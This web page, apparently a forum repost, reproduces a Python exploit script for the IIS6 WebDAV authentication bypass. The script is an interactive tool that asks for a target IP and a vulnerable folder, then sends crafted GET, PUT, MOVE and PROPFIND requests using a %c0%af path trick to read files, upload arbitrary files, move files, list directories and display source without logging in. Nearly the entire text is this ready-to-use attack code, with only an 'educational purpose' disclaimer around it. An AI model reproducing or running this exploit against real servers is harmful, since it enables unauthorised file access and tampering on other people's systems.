Microsoft IIS6 WebDAV Remote Auth Bypass Exploit-ReverseAnalysis
############################################# #!/usr/bin/python# IIS6 WebDEV Authentication bypass exploit
#
# Done by Str0ss
# mail.str0ssgmailcom
#
# Usage python
# Follow the instructions
# This exploit is made for educational purpose
#
# For this exploit to work
# 1. WebDEV should be enabled
# 2.For File upload / Dir browsing / show source
# currosponding previlage should be enabled.
# Exploit will perform only auth'n bypass.
#
# Thanks to kcope
import socket
def get():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
fn = raw_input("Enter the file name to fetch:")
req = "GET /%c0%af" + vul_fold +"/" + fn + " HTTP/1.0\r\n"
req += "Translate: F\r\n"
req += "Host: " + t_IP + "\r\n"
req += "Connection: close\r\n"
req += "\r\n\r\n"
sock.send(req)
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
sock.close()
print "\n_____SERVER RESPONSE_____\n" + string
print "\n\n USE DISPLAY SOURCE IF GET IS NOT WORKING."
#put
def put():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
file_name = raw_input("Enter the filename to upload :")
FILE = open(file_name)
text = FILE.read()
print "File content:\n" + text
FILE.close()
file_length = len(text)
req = "PUT /%c0%af/" + vul_fold + "/" + file_name +" HTTP/1.0\r\n"
req += "Connection: close\r\n"
req += "Host: " + t_IP + "\r\n"
req += "Content-Type: text/xml; charset='utf-8'\r\n"
req += "Content-Length: " + str(file_length) +"\r\n\r\n"
req += text + "\r\n"
sock.send(req)
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
sock.close()
print "\n_____SERVER RESPONSE_____\n" + string
#move
def move():
source = raw_input("Enter the source file :")
target = raw_input("Enter the target file :")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = "MOVE /vul%c0%af/" + source +" HTTP/1.0\r\n"
req += "Destination: %c0%af/vul/" + target + "\n\n"
sock.send(req)
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
sock.close()
print "\n_____SERVER RESPONSE_____\n" + string
#list
def list():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = "PROPFIND /%c0%af" + vul_fold + " HTTP/1.0\r\n"
req += "Connection: close\r\n"
req += "Host: " + t_IP + "\r\n"
req += "Content-Length: 0\r\n\r\n"
sock.send(req)
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
sock.close()
print "\n_____SERVER RESPONSE_____\n" + string
#disp source
def disp():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
fn = raw_input("Enter the file name:")
req = "GET /" + vul_fold +"%c0%af/" + fn + " HTTP/1.0\r\n"
req += "Translate: f\r\n"
req += "Connection: close\r\n"
req += "Host: " + t_IP + "\r\n"
req += "\r\n\r\n"
sock.send(req)
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
sock.close()
print "\n_____SERVER RESPONSE_____\n" + string
#main program
t_IP = raw_input("Enter the Terget web server IP address:")
t_port = 80 #change the port is the web server is running on different port
vul_fold = raw_input("Enter the vulnerable folder name:")
print "Target is :" + t_IP + "/" + vul_fold
exi = 0
while(exi == 0):
print "\n GET a file from vulnerable folder."
print "\n PUT a file into the vulnerable folder."
print "\n MOVE a file "
print "\n LIST files in a directory"
print "\n Display the source code "
print "\n Exit"
inp = raw_input("enter your choice:")
if inp == '1':
get()
if inp == '2':
put()
if inp == '3':
move()
if inp == '4':
list()
if inp == '5':
disp()
if inp == 'q':
exi = 1
print "\nThanks for using this exploit."
print "\n For any suggession / quries mailto: mail.str0ssgmailcom"
页:
[1]